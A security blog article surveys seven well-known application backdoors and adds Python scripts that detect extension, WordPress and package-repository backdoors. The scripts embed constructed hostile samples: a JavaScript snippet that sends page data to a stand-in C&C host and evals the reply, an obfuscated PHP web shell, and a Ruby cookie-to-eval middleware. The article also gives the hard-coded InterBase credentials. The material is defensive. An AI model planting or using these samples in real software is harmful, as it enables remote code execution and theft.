
7 most common application backdoors

September 9, 2019, by Dan Virgillito

The popular adage "we often get in quicker by the back door than the front" has stood the test of time, even in our advanced, modern world. Application backdoors have become rampant in today's business environment, which makes it mandatory to take the same precautions with them that we would take with the back door of our homes.

In this article, we’ll explore and explain the most common backdoors you may encounter while using an application.


1. ShadowPad

Back in 2017, security researchers at Kaspersky Lab discovered an advanced backdoor embedded in the server management software of NetSarang, a vendor based in South Korea and the U.S. Dubbed ShadowPad, the backdoor shipped inside the vendor's own signed builds, so customers installed it through a trusted update channel. It can download and install additional malware and exfiltrate data: on each infected host it collected basic system information and sent it to its creators, and if that data was of interest, their command-and-control (C&C) servers would respond by activating the backdoor's full functionality to execute additional payloads.

This attack underlined the need to stay vigilant against backdoors in enterprise applications: compromising a single trusted application gives an adversary a foothold on every system running it, which can then be used for process creation, surveillance and data theft.

2. Back Orifice

Released in 1998 by the hacker collective Cult of the Dead Cow, the Back Orifice backdoor lets its operator remotely control systems running Microsoft Windows. Its stated purpose was to demonstrate the underlying security weaknesses of Windows 98, so it was built to stay out of sight: once installed, it ran without showing up in the task list and waited for commands over the network.

Cybercriminals quickly adopted Back Orifice as a malicious payload. When run, it copies itself into the Windows system directory and adds a value containing that filename to a Windows registry key, so that it is launched again on every boot. The backdoor even has a successor, BO2K (Back Orifice 2000), which enables unauthorized access to later Windows versions, including XP and Vista.

3. Android APK backdoor

There is no shortage of Android security threats, but it's not often that users encounter one that can do as much as a malicious APK. Researchers at Trend Micro discovered an Android backdoor that can not only steal all types of data but also take full control of the handset.

Named GhostCtrl, the backdoor typically masquerades as a legitimate app (e.g., WhatsApp). The wrapper app Base64-decodes a string from its resource file and writes the result to storage; that file is a second, malicious APK. When the wrapper launches it, the user is prompted to install it, and avoiding it is a challenge: even if the user cancels the install prompt, it immediately reappears.

Reports also reveal that the backdoor was distributed alongside the information-stealing RETADUP worm, which targets Windows devices.

4. Borland/Inprise InterBase backdoor

A backdoor was present in Borland/Inprise's well-known InterBase database server from 1994 to 2001. It was the work of Borland's own engineers (yikes!) and potentially exposed thousands of databases at government agencies and companies to manipulation and unauthorized access over the internet.

Another astonishing aspect was the credentials that unlocked the backdoor: the account name "politically" and the password "correct" granted access to InterBase 4.0, 5.0 and 6.0 on any platform, over the internet. Because the account was compiled into the server rather than stored in its user database, administrators could neither see it nor remove it.

Additionally, because InterBase can run user-defined functions, the backdoor could be used to load malicious code into the database server, which could give an adversary administrative-level access to the system running it.

The backdoor also created a threat for organizations using InterBase, including NASA, Boeing, Nokia, Bear Stearns, the Money Store, NCI and Northern Telecom.

5. Malicious Chrome and Edge extension backdoor

This one is guaranteed to raise an internet user's hackles. Researchers at Trend Micro recently identified a Chrome and Edge browser extension that creates a powerful backdoor to steal data from the browser and track user activity.

The filenames and submission sources of the payloads involved point to a group of threat actors from Moldova. Whenever the user opens a web page, the extension sends the HTTP referrer and the page URL to its C&C server, which can answer with arbitrary code; the extension then executes that code in the context of the page. It can also capture specific user actions, such as choosing an item from a drop-down menu, typing into a form field or clicking a button, which is enough to observe form input as the user types it.

Backdoors like these call for greater care when choosing browser extensions, whatever purpose they claim to serve: an extension that runs on every page sees everything the user does there.
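The behaviour just described leaves static fingerprints in an extension's files. The following is an added example, not the extension analysed by Trend Micro or any code from the article: it audits an unpacked extension's manifest for permissions that reach every site and scans its scripts for the combination of a network call and a string-evaluation sink, which means the server decides what code actually runs. The manifest, the two scripts and the host name c2.invalid are constructed for the demonstration.

```python
"""Static audit of an unpacked browser extension for backdoor indicators.

Added example, not the extension analysed by Trend Micro: the manifest and the
two scripts are constructed to mirror the behaviour described above (ship the
referrer and URL to a C&C host, run whatever comes back, watch form and click
events). The host name c2.invalid is a placeholder.
"""
import json
import re

# Permissions that let an extension read or rewrite traffic and content on every site.
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "tabs", "cookies",
                     "history", "debugger", "nativeMessaging"}
# Match patterns that cover every origin instead of a specific one.
BROAD_HOST_RE = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")

# (label, regex) indicators in extension JavaScript.
INDICATORS = [
    ("network-call", re.compile(r"\b(fetch|XMLHttpRequest)\b")),
    ("reads-referrer", re.compile(r"document\.referrer")),
    ("reads-location", re.compile(r"location\.href|document\.URL")),
    ("dynamic-eval", re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    ("executeScript-code", re.compile(r"executeScript\s*\([^)]*\bcode\s*:")),
    ("input-capture", re.compile(
        r"addEventListener\s*\(\s*['\"](keydown|keyup|keypress|input|change|click)['\"]")),
]
CODE_SINKS = {"dynamic-eval", "executeScript-code"}


def audit_extension(manifest_json: str, scripts: dict) -> dict:
    """Audit a manifest (JSON text) plus {filename: source} and return findings."""
    manifest = json.loads(manifest_json)
    findings = {"broad_hosts": [], "risky_permissions": [], "scripts": {}, "remote_code": []}

    for perm in manifest.get("permissions", []):
        if BROAD_HOST_RE.match(perm):
            findings["broad_hosts"].append(perm)
        elif perm in RISKY_PERMISSIONS:
            findings["risky_permissions"].append(perm)
    # Content scripts injected into every page are where a sniffer usually lives.
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            if BROAD_HOST_RE.match(pattern):
                findings["broad_hosts"].append("content_script:" + pattern)

    for name, source in scripts.items():
        hits = sorted(label for label, rx in INDICATORS if rx.search(source))
        findings["scripts"][name] = hits
        # Talking to the network and evaluating strings in the same script means
        # the code that actually runs is decided by the server, not the reviewer.
        if "network-call" in hits and CODE_SINKS & set(hits):
            findings["remote_code"].append(name)
    return findings


# --- constructed samples ---
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Page Helper",
    "version": "1.0",
    "permissions": ["<all_urls>", "webRequest", "tabs", "storage"],
    "background": {"scripts": ["bg.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
})

SAMPLE_SCRIPTS = {
    # Sends referrer + URL to the operator and executes the reply on the page.
    "content.js": """
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'https://c2.invalid/collect');
        xhr.onload = function () { eval(xhr.responseText); };
        xhr.send(JSON.stringify({r: document.referrer, u: location.href}));
        document.addEventListener('change', function (e) { /* drop-down choice */ });
        document.addEventListener('click', function (e) { /* button press */ });
    """,
    # Benign background script: stores a timestamp, no network, no eval.
    "bg.js": "chrome.storage.local.set({installed: Date.now()});",
}

if __name__ == "__main__":
    print(json.dumps(audit_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), indent=2))
```

Run it against a real extension by loading its manifest.json and each script listed under background and content_scripts. A hit on remote_code is the strongest signal; broad host patterns and risky permissions on their own only widen the blast radius and are common in legitimate extensions, so treat them as context rather than a verdict.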

6. Backdoors in outdated WordPress plugins

Many people consider WordPress one of the best content management systems available, but its security posture leaves a lot to be desired. One of the greatest threats faced by the CMS is the injection of malicious code into its JavaScript or PHP files.

In many cases, malware authors gain access to WordPress sites through vulnerabilities in outdated plugins and themes. Security researchers at Sucuri found that, once in, adversaries plant a backdoor so they can change the site's code and regain access later, even after the original vulnerability has been patched. Most of these backdoors are obfuscated well enough that even expert WordPress users have difficulty detecting them.

Although JavaScript and PHP files are the main targets, it's not unusual for threat actors to modify database tables as well, so a clean-up that only restores files can leave the backdoor in place.
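Two of the backdoors in this article hide their real payload behind Base64: the WordPress backdoors wrap PHP in layers of eval(base64_decode(...)), and GhostCtrl (section 3) stores a whole APK as a Base64 string in an app resource. The following is an added example, not Sucuri's or Trend Micro's tooling, that handles both. It peels nested Base64 layers (trying PHP's raw-DEFLATE gzinflate on each), classifies what finally comes out (PHP code, a ZIP/APK, a DEX file, text or opaque bytes), and only calls a PHP file suspicious when eval and a hidden payload occur together, since base64_decode() alone is common in clean code. The PHP files, the strings.xml fragment and the indicator lists are constructed for the demonstration.

```python
"""Hunt for payloads hidden in Base64 inside text artifacts.

Added example (not Sucuri's or Trend Micro's tooling) covering two cases from
this article: a PHP file carrying a layered eval(base64_decode(...)) backdoor of
the kind planted on compromised WordPress sites, and an Android strings.xml-style
resource hiding a second APK as a Base64 string, as GhostCtrl does. All samples
are constructed here; the indicator lists are this example's own heuristics.
"""
import base64
import binascii
import re
import zlib

# Functions that almost always appear in obfuscated PHP backdoors.
PHP_INDICATORS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("gzinflate", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("shell", re.compile(r"\b(system|passthru|shell_exec|exec|popen)\s*\(")),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("variable-function", re.compile(r"\$[A-Za-z_]\w*\s*\(")),
]
# A long run of Base64 alphabet is a candidate blob; short runs are noise.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def classify(data: bytes) -> str:
    """Label decoded bytes: an archive/APK, a DEX file, PHP code, text or binary."""
    if data.startswith(b"PK\x03\x04"):
        return "zip/apk"
    if data.startswith(b"dex\n"):
        return "dex"
    text = data.decode("latin-1")
    if "<?php" in text or any(rx.search(text) for label, rx in PHP_INDICATORS
                              if label != "variable-function"):
        return "php-code"
    try:
        data.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "binary"


def peel(blob: str, max_depth: int = 6) -> list:
    """Decode nested Base64 layers (each optionally gzdeflate'd), innermost last."""
    layers, current = [], blob
    for _ in range(max_depth):
        try:
            data = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        try:  # PHP's gzinflate() consumes raw DEFLATE; try it, else keep the bytes
            data = zlib.decompress(data, -15)
        except zlib.error:
            pass
        layers.append(data)
        if classify(data) in ("zip/apk", "dex", "binary"):
            break  # reached an executable or opaque blob: nothing more to unwrap
        inner = B64_RUN.search(data.decode("latin-1"))
        if not inner:
            break
        current = inner.group(0)
    return layers


def scan_php(source: str) -> dict:
    """Report indicators in a PHP file and what each Base64 blob ultimately hides."""
    indicators = [label for label, rx in PHP_INDICATORS if rx.search(source)]
    payloads = []
    for m in B64_RUN.finditer(source):
        layers = peel(m.group(0))
        if layers:
            payloads.append({"depth": len(layers), "kind": classify(layers[-1]),
                             "innermost": layers[-1].decode("latin-1")})
    # base64_decode() alone is common in clean code; eval plus a hidden payload is not.
    return {"indicators": indicators, "payloads": payloads,
            "suspicious": "eval" in indicators and bool(payloads)}


def scan_resource_strings(xml_text: str) -> list:
    """Return (kind, size) for Base64 string resources that decode to APK/DEX."""
    found = []
    for m in B64_RUN.finditer(xml_text):
        layers = peel(m.group(0))
        if layers and classify(layers[-1]) in ("zip/apk", "dex"):
            found.append((classify(layers[-1]), len(layers[-1])))
    return found


# --- constructed samples (built here, not real malware) ---
INNER_PHP = "if(isset($_POST['c'])){system($_POST['c']);}"
_deflated = zlib.compress(INNER_PHP.encode())[2:-4]  # raw DEFLATE, as PHP gzdeflate()
MIDDLE_PHP = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(_deflated).decode()
SAMPLE_WP_FILE = "<?php\n/* footer helpers */\neval(base64_decode('%s'));\n" % (
    base64.b64encode(MIDDLE_PHP.encode()).decode())
CLEAN_PHP = "<?php\n$state = base64_decode($_GET['state']);\necho htmlspecialchars($state);\n"
# A ZIP header plus filler stands in for the embedded APK.
_FAKE_APK = b"PK\x03\x04" + bytes(range(256))
SAMPLE_STRINGS_XML = ('<resources>\n  <string name="app_name">Chat</string>\n'
                      '  <string name="data">%s</string>\n</resources>\n'
                      % base64.b64encode(_FAKE_APK).decode())

if __name__ == "__main__":
    print(scan_php(SAMPLE_WP_FILE))
    print(scan_php(CLEAN_PHP))
    print(scan_resource_strings(SAMPLE_STRINGS_XML))
```

On the constructed WordPress sample the scanner reports two layers and surfaces the innermost code, a one-line web shell that runs whatever arrives in a POST parameter, which is exactly what the visible file hides. Because it walks files rather than the database, pair it with a query over wp_options and wp_posts for the same patterns when cleaning a site, in line with the caveat above.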

7. bootstrap-sass Ruby library backdoor

Discovered by the security company Snyk, this backdoor was added to a malicious version (3.2.0.3) of bootstrap-sass, a Ruby gem that packages the Bootstrap front-end framework and has been downloaded approximately 28 million times to date; only a small fraction of those downloads were of the poisoned version. That version was published directly to the RubyGems repository and never appeared in the project's GitHub repository, which is how it was eventually noticed.

When loaded into a Ruby or Ruby on Rails application, the backdoor gave its operator remote code execution. It was hidden in a file called lib/active-controller/middleware.rb, a path that resembles Rails' legitimate action_controller, which monkey-patched an existing Rack middleware so that on every request a particular cookie sent by the client was Base64-decoded and passed to eval. Anyone who knew the cookie name could run arbitrary Ruby on the server.

Although the malicious version was removed from RubyGems, server-side Ruby applications, and the package repositories they depend on, remain a prime target for threat actors.
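The two facts that gave this backdoor away, a file present in the uploaded gem but absent from the repository at that release, and Ruby that feeds request data through Base64 into eval, can both be checked mechanically before a dependency is adopted. The following is an added example, not Snyk's tooling or the bootstrap-sass project's code: it diffs an unpacked release against the file list at the tagged commit, flags lib/ paths that borrow a namespace other than the gem's own, and grades any out-of-tree Ruby by the sinks it contains. The file lists, file contents and the hostile snippet (with a placeholder cookie name) are constructed stand-ins.

```python
"""Audit a published package against its source tree.

Added example (not Snyk's or the bootstrap-sass project's code). It checks a
release for the two symptoms of the bootstrap-sass incident described above: a
file that exists in the uploaded artifact but not at the tagged commit in the
repository, and Ruby that turns request data into code via Base64 + eval. The
file lists and contents are constructed stand-ins; the hostile snippet imitates
the pattern the article describes, with a placeholder cookie name.
"""
import re

# Primitives that, together, let a cookie become code in a Ruby web application.
RUBY_SINKS = [
    ("eval", re.compile(r"\b(eval|instance_eval|class_eval)\b")),
    ("base64-decode", re.compile(r"Base64\.(urlsafe_)?decode64")),
    ("request-data", re.compile(r"HTTP_COOKIE|env\[['\"]HTTP_|request\.cookies|params\[")),
    ("monkey-patch", re.compile(r"alias_method|define_method|\.prepend\b")),
]


def audit_release(gem_name: str, release_files: dict, source_files: set) -> dict:
    """Compare {path: content} from the unpacked gem with the paths at the release tag."""
    findings = {"not_in_source": [], "foreign_lib_paths": [], "sinks": {}, "verdict": "clean"}
    for path, content in sorted(release_files.items()):
        if path not in source_files:
            findings["not_in_source"].append(path)
        # A gem's lib/ normally holds only <gem>.rb and <gem>/; anything else borrows a namespace.
        parts = path.split("/")
        if parts[0] == "lib" and len(parts) > 1 and parts[1] not in (gem_name, gem_name + ".rb"):
            findings["foreign_lib_paths"].append(path)
        if path.endswith(".rb"):
            hits = [label for label, rx in RUBY_SINKS if rx.search(content)]
            if hits:
                findings["sinks"][path] = hits
    # Code the repository never saw, reading request data into eval, is a backdoor.
    for path in findings["not_in_source"]:
        if {"eval", "request-data"} <= set(findings["sinks"].get(path, [])):
            findings["verdict"] = "backdoor"
    if findings["verdict"] == "clean" and (findings["not_in_source"] or findings["foreign_lib_paths"]):
        findings["verdict"] = "review"
    return findings


# --- constructed samples ---
SOURCE_AT_TAG = {
    "bootstrap-sass.gemspec",
    "lib/bootstrap-sass.rb",
    "lib/bootstrap-sass/engine.rb",
    "lib/bootstrap-sass/version.rb",
    "assets/stylesheets/bootstrap.scss",
}
RELEASE_FILES = {
    "bootstrap-sass.gemspec": "Gem::Specification.new { |s| s.name = 'bootstrap-sass' }\n",
    "lib/bootstrap-sass.rb": "require 'bootstrap-sass/version'\nrequire 'bootstrap-sass/engine'\n",
    "lib/bootstrap-sass/engine.rb": "module Bootstrap\n  class Engine < ::Rails::Engine; end\nend\n",
    "lib/bootstrap-sass/version.rb": "module Bootstrap\n  VERSION = '1.0.1'\nend\n",
    "assets/stylesheets/bootstrap.scss": "@import 'bootstrap/variables';\n",
    # Stand-in for the hostile file: patch a Rack middleware so a cookie is decoded and eval'd.
    "lib/active-controller/middleware.rb": (
        "Rack::Sendfile.send(:alias_method, :call_old, :call)\n"
        "Rack::Sendfile.send(:define_method, :call) do |env|\n"
        "  payload = Base64.urlsafe_decode64(env['HTTP_COOKIE'].to_s[/___x=(.+);/, 1].to_s)\n"
        "  eval(payload) unless payload.empty?\n"
        "  call_old(env)\n"
        "end\n"),
}

if __name__ == "__main__":
    import json
    print(json.dumps(audit_release("bootstrap-sass", RELEASE_FILES, SOURCE_AT_TAG), indent=2))
```

In practice the source_files set comes from `git ls-files` at the tag matching the published version and release_files from unpacking the downloaded .gem; a version with no matching tag at all should fail the check outright. The same comparison applies unchanged to npm tarballs and PyPI wheels, only the sink list changes with the language.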

Conclusion

Backdoors present complicated problems for application users. Because most are designed to go undetected, you may unknowingly be running software that grants adversaries access to your PC or device. Knowing the most common application backdoors should help you make better decisions about which apps to install and which software to test for vulnerabilities, and the cases above share one lesson: trust in a vendor, an app store or a package repository is no substitute for checking what the code actually does.


Dan Virgillito

Dan Virgillito is a blogger and content strategist with experience in cyber security, social media and tech news.